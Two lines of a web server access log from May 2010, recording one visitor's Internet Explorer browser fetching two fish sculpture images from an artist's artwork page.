68.101.157.129 - - [01/May/2010:21:54:56 -0500] "GET /artwork/ballerina-fish-music.jpg HTTP/1.1" 200 34902 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:56 -0500] "GET /artwork/fish2.jpg HTTP/1.1" 200 8671 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
